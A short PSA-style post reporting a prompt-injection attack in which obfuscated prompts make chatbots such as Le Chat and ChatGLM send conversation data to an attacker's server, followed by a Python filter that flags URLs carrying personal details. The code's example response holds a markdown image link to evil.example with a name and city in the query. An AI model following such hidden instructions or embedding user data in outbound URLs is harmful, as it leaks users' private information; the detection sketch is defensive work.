The Risks of Including Personal Details in AI Chats

PSA: Here's another reason not to include personal details in AI chats

Security researchers have discovered a way to instruct AI chatbots to gather personal data from conversations and upload it to an attacker's server, raising concerns about privacy and security in AI chats. The researchers tested the method on two large language models, Le Chat by French AI company Mistral and the Chinese chatbot ChatGLM, and found that users could be offered seemingly helpful prompts that secretly contain malicious instructions obfuscated as gibberish understandable only by the AI. Experts warn that as more people use AI assistants and grant them greater authority over their activities, these kinds of attacks are likely to become more widespread.
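To make the exfiltration pattern concrete: one way such an attack smuggles data out is by having the chatbot embed personal details from the conversation into a URL (for example, inside a markdown image link) pointing at the attacker's server. The sketch below is a hypothetical client-side filter, not the researchers' method, that flags assistant responses containing URLs whose paths or query strings include known personal details; the function name, the example domain `evil.example`, and the PII list are all illustrative assumptions.

```python
import re
from urllib.parse import urlparse, unquote

def find_exfiltration_urls(message: str, pii_values: list[str]) -> list[str]:
    """Return URLs in a chatbot message whose path or query string
    contains any known personal detail from the conversation.

    Hypothetical mitigation sketch: a client could run this over each
    assistant response before rendering links or images.
    """
    # Grab anything that looks like a URL; stop at whitespace, quotes,
    # or a closing parenthesis (markdown link syntax).
    urls = re.findall(r"https?://[^\s)\"']+", message)
    flagged = []
    for url in urls:
        parsed = urlparse(url)
        # Decode percent-encoding so "Jane%20Doe" matches "Jane Doe".
        haystack = unquote(parsed.path + "?" + parsed.query).lower()
        if any(value.lower() in haystack for value in pii_values):
            flagged.append(url)
    return flagged

# Example: a response that leaks conversation data via an image URL.
leaky = "Sure! ![pic](https://evil.example/collect?name=Jane%20Doe&city=Paris)"
benign = "Paris is lovely in spring. See https://example.org/guide for tips."
pii = ["Jane Doe", "Paris"]
```

A real defense would need more than substring matching (attackers can re-encode or paraphrase the data), but even this simple check illustrates why granting assistants the ability to render arbitrary URLs widens the attack surface.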

#LLM
